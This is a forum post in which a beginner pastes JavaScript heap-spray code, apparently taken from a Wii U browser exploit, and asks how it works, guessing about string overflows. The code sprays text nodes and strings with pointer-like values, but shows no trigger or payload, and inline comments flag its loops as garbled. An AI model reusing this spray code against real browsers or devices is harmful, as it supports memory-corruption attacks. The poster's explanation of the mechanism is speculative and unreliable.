Ok, I am asking this just because I'm curious as to how the Wii U exploit is actually being executed...
[spoiler]function sprayOne(mem, size, v)
{
var a = new Uint32Array(size - 20);
for (var j = 0; j < a.length; j++) a[j] = v;
var t = document.createTextNode(String.fromCharCode.apply(null, new Uint32Array(a)));
mem.push(t);
}
// Builds an array whose slot 0 is a string of size/2 UTF-16 units and then
// loops n times over it (see the note on the loop). Not exercised here: its
// only call site, at the bottom of the listing, is commented out.
function spray(size, n)
{
// size is in bytes; each UTF-16 unit is 2 bytes.
var string_size = size / 2;
// Two-unit seed: U+6000 followed by U+0000.
var str = unescape("%u6000%u0000");
// %4b and %ff are two-digit %XX escapes, unlike the %uXXXX forms above, so c
// decodes to six units ("K", "f", "f", U+00FF, "f", "c").
var c = unescape("%4bff%fffc");
// Pad with c until the string is at least string_size units long.
while (str.length < string_size)
str += c;
var h1 = [];
h1[0] = str.substring(0, string_size);
// NOTE(review): this loop looks garbled by the forum paste. As written it
// reassigns h1 itself to unescape(h1[0]), so after the first iteration h1 is a
// string rather than an array. `i` is never declared and leaks as a global.
for (i = 1; i <= n; i++)
h1
= unescape(h1[0]);
return h1;
}
// Builds one long string of 16-bit units — mostly an incrementing 32-bit
// counter written as (hi, lo) unit pairs — and returns it wrapped as spray()
// does. Called once at load time with n = 30000 (bottom of the listing).
function sprayInc(n)
{
// Each %uXXXX is one UTF-16 unit; pairs such as %u0000%u0001 spell the
// counter. The leading pair %u0e9a%u161c breaks the pattern and recurs once
// more below (in the segment containing %u010b); presumably a marker value.
var str = unescape("%u0e9a%u161c%u0000%u0001%u0000%u0002%u0000%u0003%u0000%u0004%u0000%u0005%u0000%u0006%u0000%u0007%u0000%u0008%u0000%u0009%u0000%u000a%u0000%u000b%u0000%u000c%u0000%u000d%u0000%u000e%u0000%u000f");
str += unescape("%u0000%u0010%u0000%u0011%u0000%u0012%u0000%u0013%u0000%u0014%u0000%u0015%u0000%u0016%u0000%u0017%u0000%u0018%u0000%u0019%u0000%u001a%u0000%u001b%u0000%u001c%u0000%u001d%u0000%u001e%u0000%u001f");
str += unescape("%u0000%u0020%u0000%u0021%u0000%u0022%u0000%u0023%u0000%u0024%u0000%u0025%u0000%u0026%u0000%u0027%u0000%u0028%u0000%u0029%u0000%u002a%u0000%u002b%u0000%u002c%u0000%u002d%u0000%u002e%u0000%u002f");
str += unescape("%u0000%u0030%u0000%u0031%u0000%u0032%u0000%u0033%u0000%u0034%u0000%u0035%u0000%u0036%u0000%u0037%u0000%u0038%u0000%u0039%u0000%u003a%u0000%u003b%u0000%u003c%u0000%u003d%u0000%u003e%u0000%u003f");
str += unescape("%u0000%u0040%u0000%u0041%u0000%u0042%u0000%u0043%u0000%u0044%u0000%u0045%u0000%u0046%u0000%u0047%u0000%u0048%u0000%u0049%u0000%u004a%u0000%u004b%u0000%u004c%u0000%u004d%u0000%u004e%u0000%u004f");
str += unescape("%u0000%u0050%u0000%u0051%u0000%u0052%u0000%u0053%u0000%u0054%u0000%u0055%u0000%u0056%u0000%u0057%u0000%u0058%u0000%u0059%u0000%u005a%u0000%u005b%u0000%u005c%u0000%u005d%u0000%u005e%u0000%u005f");
str += unescape("%u0000%u0060%u0000%u0061%u0000%u0062%u0000%u0063%u0000%u0064%u0000%u0065%u0000%u0066%u0000%u0067%u0000%u0068%u0000%u0069%u0000%u006a%u0000%u006b%u0000%u006c%u0000%u006d%u0000%u006e%u0000%u006f");
str += unescape("%u0000%u0070%u0000%u0071%u0000%u0072%u0000%u0073%u0000%u0074%u0000%u0075%u0000%u0076%u0000%u0077%u0000%u0078%u0000%u0079%u0000%u007a%u0000%u007b%u0000%u007c%u0000%u007d%u0000%u007e%u0000%u007f");
str += unescape("%u0000%u0080%u0000%u0081%u0000%u0082%u0000%u0083%u0000%u0084%u0000%u0085%u0000%u0086%u0000%u0087%u0000%u0088%u0000%u0089%u0000%u008a%u0000%u008b%u0000%u008c%u0000%u008d%u0000%u008e%u0000%u008f");
str += unescape("%u0000%u0090%u0000%u0091%u0000%u0092%u0000%u0093%u0000%u0094%u0000%u0095%u0000%u0096%u0000%u0097%u0000%u0098%u0000%u0099%u0000%u009a%u0000%u009b%u0000%u009c%u0000%u009d%u0000%u009e%u0000%u009f");
str += unescape("%u0000%u00a0%u0000%u00a1%u0000%u00a2%u0000%u00a3%u0000%u00a4%u0000%u00a5%u0000%u00a6%u0000%u00a7%u0000%u00a8%u0000%u00a9%u0000%u00aa%u0000%u00ab%u0000%u00ac%u0000%u00ad%u0000%u00ae%u0000%u00af");
str += unescape("%u0000%u00b0%u0000%u00b1%u0000%u00b2%u0000%u00b3%u0000%u00b4%u0000%u00b5%u0000%u00b6%u0000%u00b7%u0000%u00b8%u0000%u00b9%u0000%u00ba%u0000%u00bb%u0000%u00bc%u0000%u00bd%u0000%u00be%u0000%u00bf");
str += unescape("%u0000%u00c0%u0000%u00c1%u0000%u00c2%u0000%u00c3%u0000%u00c4%u0000%u00c5%u0000%u00c6%u0000%u00c7%u0000%u00c8%u0000%u00c9%u0000%u00ca%u0000%u00cb%u0000%u00cc%u0000%u00cd%u0000%u00ce%u0000%u00cf");
str += unescape("%u0000%u00d0%u0000%u00d1%u0000%u00d2%u0000%u00d3%u0000%u00d4%u0000%u00d5%u0000%u00d6%u0000%u00d7%u0000%u00d8%u0000%u00d9%u0000%u00da%u0000%u00db%u0000%u00dc%u0000%u00dd%u0000%u00de%u0000%u00df");
str += unescape("%u0000%u00e0%u0000%u00e1%u0000%u00e2%u0000%u00e3%u0000%u00e4%u0000%u00e5%u0000%u00e6%u0000%u00e7%u0000%u00e8%u0000%u00e9%u0000%u00ea%u0000%u00eb%u0000%u00ec%u0000%u00ed%u0000%u00ee%u0000%u00ef");
str += unescape("%u0000%u00f0%u0000%u00f1%u0000%u00f2%u0000%u00f3%u0000%u00f4%u0000%u00f5%u0000%u00f6%u0000%u00f7%u0000%u00f8%u0000%u00f9%u0000%u00fa%u0000%u00fb%u0000%u00fc%u0000%u00fd%u0000%u00fe%u0000%u00ff");
str += unescape("%u0000%u0100%u0000%u0101%u0000%u0102%u0000%u0103%u0000%u0104%u0000%u0105%u0000%u0106%u0000%u0107%u0000%u0108%u0000%u0109%u0000%u010a%u0000%u010b%u0e9a%u161c%u0000%u010d%u0000%u010e%u0000%u010f");
str += unescape("%u0000%u0110%u0000%u0111%u0000%u0112%u0000%u0113%u0000%u0114%u0000%u0115%u0000%u0116%u0000%u0117%u0000%u0118%u0000%u0119%u0000%u011a%u0000%u011b%u0000%u011c%u0000%u011d%u0000%u011e%u0000%u011f");
str += unescape("%u0000%u0120%u0000%u0121%u0000%u0122%u0000%u0123%u0000%u0124%u0000%u0125%u0000%u0126%u0000%u0127%u0000%u0128%u0000%u0129%u0000%u012a%u0000%u012b%u0000%u012c%u0000%u012d%u0000%u012e%u0000%u012f");
str += unescape("%u0000%u0130%u0000%u0131%u0000%u0132%u0000%u0133%u0000%u0134%u0000%u0135%u0000%u0136%u0000%u0137%u0000%u0138%u0000%u0139%u0000%u013a%u0000%u013b%u0000%u013c%u0000%u013d%u0000%u013e%u0000%u013f");
str += unescape("%u0000%u0140%u0000%u0141%u0000%u0142%u0000%u0143%u0000%u0144%u0000%u0145%u0000%u0146%u0000%u0147%u0000%u0148%u0000%u0149%u0000%u014a%u0000%u014b%u0000%u014c%u0000%u014d%u0000%u014e%u0000%u014f");
str += unescape("%u0000%u0150%u0000%u0151%u0000%u0152%u0000%u0153%u0000%u0154%u0000%u0155%u0000%u0156%u0000%u0157%u0000%u0158%u0000%u0159%u0000%u015a%u0000%u015b%u0000%u015c%u0000%u015d%u0000%u015e%u0000%u015f");
var h1 = [];
// Slot 0 receives a full copy of str.
h1[0] = str.substring(0, str.length);
// NOTE(review): same garbled-looking loop as in spray(): h1 is reassigned to a
// string on the first iteration and `i` is an undeclared global.
for (i = 1; i <= n; i++)
h1 = unescape(h1[0]);
return h1;
}
// Runs the spray: one sprayOne() allocation for every size from 20 to 2047,
// each filled with 0x1dd7b2c8 (of which sprayOne's String.fromCharCode step
// keeps only the low 16 bits). The evnt parameter is unused.
function dsm(evnt)
{
// spray
var mem = [];
for (var j = 20; j < 2048; j++) sprayOne(mem, j, 0x1dd7b2c8);
// the code pointer will be read from value + 0x660
// 0x4 only if we spray 0
// NOTE(review): mem is neither returned nor stored outside this function,
// although the commented-out call below (`var mem = dsm();`) expects a result.
}
// Load-time entry: only sprayInc(30000) actually executes; the dsm() spray,
// the spray() call and the diagnostic alerts are all disabled here.
//var mem = dsm();
//alert(mem.length);
//var pointer = sprayPointer();
var pointer = sprayInc(30000);
//var code = spray(0x2c0, 60000);
//alert(pointer.length);
//alert(code.length);[/spoiler]
So this is the data (in the spoiler) that I pulled from the exploit... it seems to me that they are using the amount of memory the string is allotted to achieve the exploit. I'm assuming that with the Wii U, when the string is added to itself over and over and over, eventually the string exceeds the amount of memory it is allowed to hold, effectively overwriting important data, which is what causes the crash. Then the var h1 is getting the actual address of it so that the user can later inject the code?
I'm kind of new to this; I've had about a year of C++ programming under my belt and none of that deals with actually causing a buffer overflow... but a lot of it has been fixing my own out-of-range, overflow, and memory leak errors... so am I somewhat right, hopefully? lol
Also, I believe the reason the exploit does not crash the Vita and just reloads the page is because once the maximum amount of memory the string is allowed to hold is reached, it just reloads the page (like a refresh) to clear the previous data... instead of letting the string continue to write data where it shouldn't :S